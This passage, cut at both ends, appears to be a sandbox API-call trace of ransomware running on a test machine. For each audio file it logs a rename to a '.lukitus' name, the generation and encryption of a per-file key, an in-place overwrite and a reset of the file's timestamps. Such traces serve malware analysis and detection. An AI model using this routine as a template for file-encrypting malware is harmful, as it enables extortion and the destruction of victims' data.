(in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.468] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\BpH_tgEJy5Xpr.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\bph_tgejy5xpr.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.468] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\BpH_tgEJy5Xpr.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\bph_tgejy5xpr.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-8E846290-5233B81C7D00.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-8e846290-5233b81c7d00.lukitus"), dwFlags=0x9) returned 1 [0108.475] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.475] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.480] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x16e31, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x16e31, lpOverlapped=0x0) returned 1 [0108.481] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.481] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x16e31, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x16e31, lpOverlapped=0x0) returned 1 [0108.481] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.481] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64afcb10, dwHighDateTime=0x1d31760)) [0108.481] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.481] FlushFileBuffers (hFile=0x328) returned 1 [0108.485] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\CcdGKWAWrhI8xFJ.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ccdgkwawrhi8xfj.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552b6970, ftCreationTime.dwHighDateTime=0x1d2f5e5, ftLastAccessTime.dwLowDateTime=0x6d87ef80, ftLastAccessTime.dwHighDateTime=0x1d300a7, ftLastWriteTime.dwLowDateTime=0x6d87ef80, ftLastWriteTime.dwHighDateTime=0x1d300a7, nFileSizeHigh=0x0, nFileSizeLow=0x13d09)) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.485] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\CcdGKWAWrhI8xFJ.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ccdgkwawrhi8xfj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.486] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\CcdGKWAWrhI8xFJ.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ccdgkwawrhi8xfj.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-F4705DFD-535CF3EF79B9.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-f4705dfd-535cf3ef79b9.lukitus"), dwFlags=0x9) returned 1 [0108.488] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.488] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.493] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x13d09, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x13d09, lpOverlapped=0x0) returned 1 [0108.493] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.493] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x13d09, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x13d09, lpOverlapped=0x0) returned 1 [0108.494] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.494] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64afcb10, dwHighDateTime=0x1d31760)) [0108.494] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.494] FlushFileBuffers (hFile=0x328) returned 1 [0108.498] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\dsXG2.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\dsxg2.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2a65370, ftCreationTime.dwHighDateTime=0x1d2faed, ftLastAccessTime.dwLowDateTime=0x672e5080, ftLastAccessTime.dwHighDateTime=0x1d301a0, ftLastWriteTime.dwLowDateTime=0x672e5080, ftLastWriteTime.dwHighDateTime=0x1d301a0, nFileSizeHigh=0x0, nFileSizeLow=0x274d)) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.498] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\dsXG2.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\dsxg2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.498] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\dsXG2.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\dsxg2.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-E9F295FD-1189F8AFFE87.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-e9f295fd-1189f8affe87.lukitus"), dwFlags=0x9) returned 1 [0108.500] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.500] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.504] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x274d, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x274d, lpOverlapped=0x0) returned 1 [0108.505] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.505] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x274d, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x274d, lpOverlapped=0x0) returned 1 [0108.505] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.506] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64b22c70, dwHighDateTime=0x1d31760)) [0108.506] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.506] FlushFileBuffers (hFile=0x328) returned 1 [0108.509] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\e0ajYWavTiTc8vxhoYhm.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\e0ajywavtitc8vxhoyhm.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f003410, ftCreationTime.dwHighDateTime=0x1d2fd9a, ftLastAccessTime.dwLowDateTime=0x36e45c90, ftLastAccessTime.dwHighDateTime=0x1d2fe75, ftLastWriteTime.dwLowDateTime=0x36e45c90, ftLastWriteTime.dwHighDateTime=0x1d2fe75, nFileSizeHigh=0x0, nFileSizeLow=0xcf8b)) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.509] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\e0ajYWavTiTc8vxhoYhm.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\e0ajywavtitc8vxhoyhm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.509] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\e0ajYWavTiTc8vxhoYhm.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\e0ajywavtitc8vxhoyhm.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-BCF63BC1-5BBE68E793E7.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-bcf63bc1-5bbe68e793e7.lukitus"), dwFlags=0x9) returned 1 [0108.512] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.512] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.517] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xcf8b, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xcf8b, lpOverlapped=0x0) returned 1 [0108.517] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.517] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xcf8b, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xcf8b, lpOverlapped=0x0) returned 1 [0108.518] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64b48dd0, dwHighDateTime=0x1d31760)) [0108.518] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.518] FlushFileBuffers (hFile=0x328) returned 1 [0108.521] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\epFY_vnRuzs.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\epfy_vnruzs.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x405caa60, ftCreationTime.dwHighDateTime=0x1d305c4, ftLastAccessTime.dwLowDateTime=0x1a18340, ftLastAccessTime.dwHighDateTime=0x1d302b3, ftLastWriteTime.dwLowDateTime=0x1a18340, ftLastWriteTime.dwHighDateTime=0x1d302b3, nFileSizeHigh=0x0, nFileSizeLow=0x11749)) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.521] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.522] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\epFY_vnRuzs.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\epfy_vnruzs.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.522] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\epFY_vnRuzs.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\epfy_vnruzs.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-6A36D603-50F4DEB3E87F.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-6a36d603-50f4deb3e87f.lukitus"), dwFlags=0x9) returned 1 [0108.523] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.523] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.528] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x11749, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x11749, lpOverlapped=0x0) returned 1 [0108.529] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, 